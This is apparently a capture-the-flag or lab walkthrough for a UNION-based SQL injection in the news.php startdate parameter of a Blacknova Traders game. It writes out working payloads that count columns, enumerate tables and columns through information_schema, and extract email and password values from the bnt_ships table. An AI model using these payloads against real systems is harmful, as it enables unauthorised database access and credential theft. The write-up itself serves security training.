Walkthrough: SQL Injection - Union (Blacknova Traders)

Tools Used:

From the homepage, click "Rankings". This page is served to both logged-out and logged-in users, so it is part of the game proper, and because of that it shows the news ticker at the bottom.

Click on the news ticker ("Sorry, no news today") to open up the news page.

On this page, you can see "Previous Day" and "Next Day" controls that change which day's news you are viewing. Click through a few days and you'll see that the date is passed as a GET parameter in the URL: news.php?startdate=2018/12/23

Based on the original hack, we know this parameter is vulnerable to a UNION-based SQL injection. UNION-based SQL injections follow this pattern:

' UNION SELECT 1,2,3--
The catch is that the injected SELECT has to return exactly the same number of columns as the query it is UNIONed with (with types the database is willing to combine), otherwise the database throws an error and the page breaks. That isn't much of an obstacle: add one column at a time until the page renders without an error, and you'll end up with a working injection like this (one caveat: MySQL only treats -- as a comment when whitespace follows it, so if a bare -- at the end of the URL fails, use --+ or -- - instead):

news.php?startdate=2018/12/23' UNION SELECT 1,2,3,4,5,6--

This injection renders the second and third values of our UNIONed SELECT into the page, so those two positions are where we place whatever we want to extract from the database. Let's re-read the challenge: "Use SQL Injection to obtain the password of the ship/user named [email protected] - their password is the flag."

So we need to find the ship/user table. Let's list the tables with this injection (on a busy server this also lists the tables of MySQL's own schemas; appending WHERE table_schema=database() restricts the output to the game's database):

news.php?startdate=2018/12/23' UNION SELECT 1,table_name,3,4,5,6 FROM information_schema.tables--

Excellent, the table we want is bnt_ships. Now we need the names of the columns we want to pull from that table:

news.php?startdate=2018/12/23' UNION SELECT 1,column_name,data_type,4,5,6 FROM information_schema.columns WHERE table_name='bnt_ships'--

We need the password, and the challenge text gives us the email to look for, so let's pull those two columns.

news.php?startdate=2018/12/23' UNION SELECT 1,email,password,4,5,6 FROM bnt_ships--

Boom, we have the flag.